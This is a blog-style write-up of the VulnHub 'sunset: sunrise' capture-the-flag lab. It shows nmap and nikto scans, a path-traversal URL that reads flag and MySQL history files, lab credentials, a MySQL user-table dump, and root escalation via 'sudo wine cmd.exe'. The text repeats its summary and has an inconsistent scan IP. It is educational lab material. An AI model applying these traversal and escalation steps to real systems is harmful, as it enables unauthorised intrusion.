Hello Everyone, let's begin
ctf link : https://www.vulnhub.com/entry/sunset-sunrise,406/
download link : https://download.vulnhub.com/sunset/sunrise.7z
I opened it with Virtualbox in bridged network with inteface named vmnet8 (172.16.59.0/24).
CTF level : Beginner
Vulnerabilities to exploit : OSVDB:721 - Badblue server
Technique and tools : Nmap, Nikto, Firefox, ssh, mysql
Total flags: 2
I found IP using arp-scan
I found IP of the ctf machine 172.16.59.142
2 http services are running at port 80 and 8080.
I used nikto to collect useful information about them.
Nikto didn't find any vulnerability at port 80 but port 8080 is vulnerable to path traversal.
So I tried looking into it and found my first flag
Then I started fuzzing the directory for hidden logs and i found mysql credential.
So I tried same credential in SSH
Now I'm local to the machine. I should try mysql again.
I should look for other credentials inside database mysql
I got another user's credential:
Huh, It was easy. After getting into sudoer user. I checked sudo permission.
On looking into root directory, I found the flag.
Finally I got the last flag.
ctf link : https://www.vulnhub.com/entry/sunset-sunrise,406/
download link : https://download.vulnhub.com/sunset/sunrise.7z
I opened it with Virtualbox in bridged network with inteface named vmnet8 (172.16.59.0/24).
CTF level : Beginner
Vulnerabilities to exploit : OSVDB:721 - Badblue server
Technique and tools : Nmap, Nikto, Firefox, ssh, mysql
Total flags: 2
I found IP using arp-scan
sudo arp-scan --interface vmnet8 --local
I found IP of the ctf machine 172.16.59.142
I started scanning well-known 1000 ports and banner grabbing using nmap
sudo nmap -sSV 192.168.0.142
2 http services are running at port 80 and 8080.
I used nikto to collect useful information about them.
nikto -h http://172.16.59.142
nikto -h http://172.16.59.142:8080
Nikto didn't find any vulnerability at port 80 but port 8080 is vulnerable to path traversal.
So I tried looking into it and found my first flag
http://172.16.59.142:8080/%2f..%2f..%2fhome/sunrise/user.txt
a6050aecf6303b0b824038807d823a89
 |
| FLAG1 |
http://172.16.59.142:8080/%2f..%2f..%2fhome/weborf/.mysql_history
Mysql Credential:I tried connecting to Mysql...but it didn't work.
Username: weborf
Password: iheartrainbows44
So I tried same credential in SSH
ssh weborf@172.16.59.142
Now I'm local to the machine. I should try mysql again.
mysql -p
I should look for other credentials inside database mysql
use mysql;
show tables;
show columns from user;
select User,Password from user;
I got another user's credential:
Username: sunriselet's switch to this user to check sudo permissions.
Password: thefutureissobrightigottawearshades
su sunrise
Huh, It was easy. After getting into sudoer user. I checked sudo permission.
sudo -lAnd I found that I have an application that i can run as root
(root) /usr/bin/wineI thought, why not use cmd...it has been since I've seen one.
sudo wine cmd.exeWow, I'm root now.
On looking into root directory, I found the flag.
cd /root
dir
more root.txt
Finally I got the last flag.
24edb59d21c273c033aa6f1689b0b18
Comments
Post a Comment